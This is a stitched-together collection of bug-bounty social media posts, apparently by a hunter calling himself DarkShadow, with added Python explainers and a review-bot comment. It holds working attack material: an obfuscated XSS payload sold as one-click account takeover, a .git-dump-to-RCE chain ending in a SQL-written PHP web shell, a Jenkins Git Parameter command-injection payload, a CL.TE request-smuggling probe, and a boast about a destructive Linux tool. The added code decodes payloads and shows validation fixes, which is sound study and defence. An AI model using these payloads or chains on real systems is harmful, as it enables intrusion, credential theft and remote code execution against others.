Hey Hunters,
DarkShadow here back again, dropping a recent XSS patch in Paytm!
Steps to reproduce:
1. Enter the payload in the search box.
2. Grab the URL.
3. Send it to the victim.
4. One-click account takeover!
Payload:
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
Credit: ~@TEAM_DH049
#bugbountytips #xss
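Before forwarding an obfuscated payload like the one in the post above, decode it and confirm what it actually executes. The Python below is an added example written for this page; it is not code from the post, from its author or from Paytm. It peels the two layers the payload uses: the \uXXXX escapes inside the string literal handed to new Function, then the numeric argument list of fromCharCode. Run against the payload exactly as it appears above, the Function body decodes to string.fromCharCode(97,108,101,109,116,40,49,49,49,41), whose codes spell alemt(111). The JavaScript global is String with a capital S, and the codes for alert(111) are 97,108,101,114,116,40,49,49,49,41 (code 114 is r, 109 is m). A body that only builds a string also returns it without calling anything; new Function(...)() fires an alert only if the decoded body itself calls alert.

```python
import re

# The payload exactly as posted above (raw string, so the \u escapes stay
# literal and are decoded by the functions below rather than by Python).
POSTED_PAYLOAD = r"<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>"


def extract_function_body(payload):
    """Pull the string literal handed to new Function(...) out of the tag."""
    m = re.search(r"new Function\('([^']*)'\)", payload)
    return m.group(1) if m else None


def decode_unicode_escapes(text):
    """Turn every \\uXXXX escape into the character it names, which is what
    the JS engine does when it parses the string literal."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), text)


def decode_from_char_code(expr):
    """Evaluate the numeric argument list of a fromCharCode(...) call."""
    m = re.search(r"fromCharCode\(([\d,\s]+)\)", expr)
    if not m:
        return None
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def char_codes(text):
    """Inverse helper: the codes you would feed to String.fromCharCode."""
    return [ord(c) for c in text]


def analyse(payload):
    """Return what the Function body decodes to at each layer, or None if
    the tag does not contain a new Function('...') call."""
    body = extract_function_body(payload)
    if body is None:
        return None
    source = decode_unicode_escapes(body)
    return {"function_body": source,
            "built_string": decode_from_char_code(source)}


if __name__ == "__main__":
    print(analyse(POSTED_PAYLOAD))
    print(char_codes("alert(111)"))
```

The same two functions work on any payload that chains escape sequences and fromCharCode; the regexes are deliberately narrow (single-quoted Function body, decimal code list) so they fail loudly with None on anything else rather than guessing.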
Hey Hunters,
DarkShadow here back again....
Just wanted to announce to all of you that:
Instagram.com is my now
Let me know what your Instagram account ID is, I wanna see your chats in Instagram
Don't forget to follow me: x.com/darkshadow2bd
Hey Hunters,
DarkShadow here back again, dropping one of my secret methodologies that turns into a full Remote Code Execution!
From /.git to FULL RCE: The Ultimate Git-Based Exploitation Chain
Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging-fruit misconfiguration?
Think again; we're about to break that into Critical RCE.
Tip: Use Chrome extensions like DotGit, GitHound, or any of your favorite fuzzing tools.
Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
This tool will recursively download the entire .git repository into the webCode directory.
Step 2: Reconstruct the Source Code
cd webCode
git checkout .
This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
git log -p
Look for hardcoded credentials, tokens, DB configs, etc.
Realistic Example:
commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date: Thu Jul 11 17:32:15 2024 +0000
Added database config
diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>
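Review bot: this hunk commits production database credentials in plaintext ($db_user = "root" and $db_pass = "master_!pass2020") into config.php, which is exactly what the git log -p step above harvests, and the secret stays in history even if a later commit deletes the file. Keep credentials out of the repository (environment variables or a config file listed in .gitignore) and rotate this password once it has been committed. Note also that the host value "258.20.78.55" is not a valid IPv4 address, since an octet cannot exceed 255.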
We've got the database password!
Step 4: Connect to the Database
mysql -h 258.20.78.55 -u root -p'master_!pass2020'
Step 5: Escalate to RCE via SQL
Check your privileges:
SHOW GRANTS FOR CURRENT_USER;
If You Have the FILE Privilege:
Write a web shell to the web root:
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then browse:
https://target.com/shell.php?cmd=id
Boom: Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X: x.com/darkshadow2bd
#bugbountytips
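Steps 1 to 3 above lean on the layout of .git/objects/: every file, tree and commit is a zlib-compressed buffer named by the SHA-1 of its contents, and a dumper just fetches those paths and lets git reassemble them. The Python below is an added example for this page, not code from the post, from GitTools or from git itself. It builds a constructed two-commit repository in memory (the config.php from the post as the only blob, with author/committer lines left out of the commits since this parser does not need them), then does what the dump-and-grep steps do by hand: verifies each downloaded object's hash against its name, walks parent pointers from HEAD the way git log does, and scans blob contents for credential-looking assignments. The allow-list regex and the repository contents are assumptions made for the example.

```python
import hashlib
import re
import zlib


def make_loose_object(kind, data):
    """Build a git loose object as git stores it: '<type> <size>\\0' + content,
    named by the SHA-1 of that buffer and zlib-compressed on disk."""
    raw = b"%s %d\x00%s" % (kind.encode(), len(data), data)
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def parse_loose_object(compressed):
    """Inverse of make_loose_object. Rejects a bad header or size so that a
    truncated download or an HTML error page is noticed instead of trusted."""
    raw = zlib.decompress(compressed)
    header, nul, data = raw.partition(b"\x00")
    if not nul:
        raise ValueError("missing NUL after object header")
    kind, size = header.split(b" ")
    if int(size) != len(data):
        raise ValueError("object size mismatch")
    return kind.decode(), data, hashlib.sha1(raw).hexdigest()


def object_path(sha_hex):
    """Path of the object under .git/, i.e. the URL suffix a dumper fetches."""
    return ".git/objects/%s/%s" % (sha_hex[:2], sha_hex[2:])


def parse_commit(data):
    """Split a commit object into its tree, parent list and message."""
    headers, _, message = data.decode().partition("\n\n")
    out = {"tree": None, "parents": [], "message": message.strip()}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            out["tree"] = value
        elif key == "parent":
            out["parents"].append(value)
    return out


# Assignments whose variable name looks credential-bearing, e.g. $db_pass = "...".
SECRET_RE = re.compile(
    r"(?i)\$?([A-Za-z_]*(?:pass(?:word|wd)?|secret|token|api_?key)[A-Za-z_]*)"
    r"\s*=\s*[\"']([^\"']+)[\"']")


def find_secrets(text):
    return {m.group(1): m.group(2) for m in SECRET_RE.finditer(text)}


def walk_history(objects, head_sha):
    """Follow parent pointers from HEAD like 'git log'. `objects` maps
    sha -> compressed bytes, what a dumper collected from .git/objects/."""
    seen, queue = [], [head_sha]
    while queue:
        sha = queue.pop(0)
        if sha in seen or sha not in objects:
            continue
        kind, data, actual = parse_loose_object(objects[sha])
        if actual != sha:
            raise ValueError("hash mismatch for %s" % sha)
        if kind == "commit":
            seen.append(sha)
            queue.extend(parse_commit(data)["parents"])
    return seen


def scan_blobs(objects):
    """Verify every object's name against its content, then grep the blobs."""
    findings = {}
    for sha, comp in objects.items():
        kind, data, actual = parse_loose_object(comp)
        if actual != sha:
            raise ValueError("hash mismatch for %s" % sha)
        if kind == "blob":
            hits = find_secrets(data.decode("utf-8", "replace"))
            if hits:
                findings[sha] = hits
    return findings


# Constructed sample repo (nothing is fetched from a real target): the
# config.php from the post, an empty root commit, one commit adding the file.
CONFIG_PHP = (b'<?php\n$db_host = "258.20.78.55";\n$db_user = "root";\n'
              b'$db_pass = "master_!pass2020";\n$db_name = "production";\n?>\n')


def build_sample_repo():
    objects = {}
    blob_sha, blob = make_loose_object("blob", CONFIG_PHP)
    objects[blob_sha] = blob
    # Tree entries are '<mode> <name>\0' followed by the 20 raw SHA-1 bytes.
    tree_sha, tree = make_loose_object(
        "tree", b"100644 config.php\x00" + bytes.fromhex(blob_sha))
    objects[tree_sha] = tree
    empty_sha, empty = make_loose_object("tree", b"")
    objects[empty_sha] = empty
    root_sha, root = make_loose_object(
        "commit", b"tree %s\n\nInitial commit\n" % empty_sha.encode())
    objects[root_sha] = root
    head_sha, head = make_loose_object(
        "commit", b"tree %s\nparent %s\n\nAdded database config\n"
        % (tree_sha.encode(), root_sha.encode()))
    objects[head_sha] = head
    return objects, head_sha, blob_sha
```

On a real dump, objects come from the fetched .git/objects/xx/yyyy files (and from packfiles, which this example does not parse); the hash check matters because servers that answer every path with a 200 error page will otherwise fill the dump with junk that git checkout then rejects.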
COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.
https://github.com/commixproject/commix
#bugbountytips #bugbounty
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files!
github.com/musana/fuzzuli
Hey Hunters,
DarkShadow here back again, just dropping a critical RCE...
Jenkins Git Parameter Plugin: Command Injection
The Jenkins plugin "Git Parameter" (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
Set parameter type: branch
Input the payload in the default value field: $(sleep 80)
Insert here: $(YOUR OS COMMANDS)
So guys, if you'd like to read more of the latest POCs, show your love and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
Guys, finally I made Linuxbomber.
A tool that exploits the Linux environment and is able to permanently damage any Linux OS; in some cases it even exploits hardware.
Let me know, can I upload the tool to my GitHub?
Made just for educational purposes only.
One of my students, on the very first day of the Advanced Web Pentesting session, just performed a basic automation scan and got a sensitive information disclosure.
If you want to enroll and learn from the very beginner level, then DM us on https://wa.link/brutsecurity
CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability
PoC: https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
Dorks
HUNTER: product.name="Jenkins"
Refer: https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
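Both the Git Parameter PoC post above (default value $(sleep 80)) and this CVE-2025-53652 post describe the same bug class: a build parameter that is supposed to be a branch name reaches a command line that a shell parses, and the value is not checked against the choices the parameter offered. The Python below is an added example for this page, not the plugin's code (which is Java) and not the linked PoC. It uses echo in place of git so it runs on any machine: the first function shows why $(...) executes when a parameter is pasted into a shell string, the second shows the two fixes a plugin needs (only accept a submitted value that was actually offered, and pass the value as its own argv element after an allow-list check). The allow-list regex is an assumption, stricter than git's own check-ref-format rules.

```python
import re
import subprocess

# Allow-list for a Git ref name (assumed for this example, tighter than git's
# check-ref-format): leading character alphanumeric so the value can never
# start with '-' and become a git option, then a small safe set, length-capped.
REF_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$")


def is_valid_ref(value):
    """True only for values that are plausibly a branch or tag name."""
    if not REF_RE.match(value):
        return False
    if ".." in value or "//" in value or "@{" in value:
        return False
    return not value.endswith((".lock", "/", "."))


def choose_branch(offered, submitted):
    """The server-side check an unvalidated-input bug lacks: the value sent
    with the build must be one of the choices the parameter actually offered."""
    if submitted not in offered:
        raise ValueError("not an offered choice: %r" % submitted)
    return submitted


def run_with_shell_interpolation(branch):
    """Flawed pattern: the parameter is pasted into a command line that
    /bin/sh parses, so $(...), backticks and ';' run before the real command
    ever sees the value. 'echo' stands in for git here."""
    cmd = "echo checking out %s" % branch
    return subprocess.run(["sh", "-c", cmd], capture_output=True,
                          text=True).stdout.strip()


def run_with_argv(branch):
    """Hardened pattern: validate, then hand the value over as its own argv
    entry so no shell ever interprets it."""
    if not is_valid_ref(branch):
        raise ValueError("rejected Git parameter value: %r" % branch)
    return subprocess.run(["echo", "checking out", branch],
                          capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    print(run_with_shell_interpolation("$(echo injected)"))  # shell ran it
    print(run_with_argv("feature/login"))                    # literal value
```

When testing a Jenkins instance, the $(sleep 80) value from the PoC post is the time-based equivalent of the first function: a build that stalls for roughly 80 seconds longer than usual tells you the parameter reached a shell.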
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)!
Check it out!
https://github.com/kevin-mizu/domloggerpp
How to manually check for CL.TE Request Smuggling Vulnerabilities:
1. See if a GET request accepts POST
2. See if it accepts HTTP/1
3. Disable "Update Content-Length"
4. Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked

0

G
5. Send the request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
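Why the probe above produces "GPOST": Content-Length: 6 covers exactly the bytes 0, CRLF, CRLF, G, so a front end that honours Content-Length forwards all six, while a back end that honours Transfer-Encoding stops after the zero-size chunk and its trailing CRLF and keeps the G as the start of the next request. The Python below is an added example written for this page, not PortSwigger's code or the lab's. It builds the probe byte-for-byte, then parses a constructed stream (the probe followed by an ordinary request) twice, once with each header given priority, and returns the request lines each side believes it received. The follow-up request and the host name are made up for the example; send_twice is the raw-socket version of step 5 and is not exercised offline.

```python
import socket


def build_clte_probe(host):
    """The probe from the post: Content-Length says 6, Transfer-Encoding says
    chunked, and the body '0\\r\\n\\r\\nG' is exactly 6 bytes long."""
    body = b"0\r\n\r\nG"
    return (b"POST / HTTP/1.1\r\nHost: " + host.encode() +
            b"\r\nContent-Length: " + str(len(body)).encode() +
            b"\r\nTransfer-Encoding: chunked\r\n\r\n" + body)


def split_headers(raw):
    """Return (request line, lower-cased header dict, bytes after headers)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def consume_by_content_length(raw):
    """Front-end style: trust Content-Length. Returns (one request, leftover)."""
    _, headers, rest = split_headers(raw)
    n = int(headers.get(b"content-length", b"0"))
    head_len = len(raw) - len(rest)
    return raw[:head_len + n], rest[n:]


def consume_by_chunked(raw):
    """Back-end style: Transfer-Encoding wins; read chunks up to the 0 chunk
    and its terminating CRLF. Whatever follows is the next request.
    Raises ValueError on a stream with no terminating chunk."""
    _, _, rest = split_headers(raw)
    head_len = len(raw) - len(rest)
    pos = 0
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            pos = rest.index(b"\r\n", pos) + 2  # empty trailer section
            break
        pos += size + 2
    return raw[:head_len + pos], rest[pos:]


def request_lines_seen(stream, prefer_te):
    """Walk a byte stream as a server would and return the request line of
    every request it parses. prefer_te=True models the back end (TE wins),
    False models the front end (CL wins)."""
    seen = []
    while stream:
        line, headers, _ = split_headers(stream)
        chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        if prefer_te and chunked:
            _, stream = consume_by_chunked(stream)
        else:
            _, stream = consume_by_content_length(stream)
        seen.append(line)
    return seen


def send_twice(host, port, probe):
    """Step 5 of the post over a raw socket: deliver the probe twice and
    collect the replies. Not used by the offline demonstration."""
    replies = []
    for _ in range(2):
        with socket.create_connection((host, port), timeout=10) as s:
            s.sendall(probe)
            replies.append(s.recv(4096))
    return replies


# Constructed traffic: an ordinary request arriving after the probe.
FOLLOW_UP = (b"POST / HTTP/1.1\r\nHost: target.example\r\n"
             b"Content-Length: 0\r\n\r\n")
```

With prefer_te=False both requests parse as POST; with prefer_te=True the second request line becomes GPOST / HTTP/1.1, which is the "Unrecognized method GPOST" the post tells you to look for. The same parser pair also explains the false-negative case: if the front end itself prefers Transfer-Encoding, the leftover never reaches the back end and the probe shows nothing.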
CVE-2025-7384: Critical PHP Object Injection in WordPress Plugin
A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.
Netlas: https://nt.ls/Be3g6
Advisory: https://nt.ls/RoI8t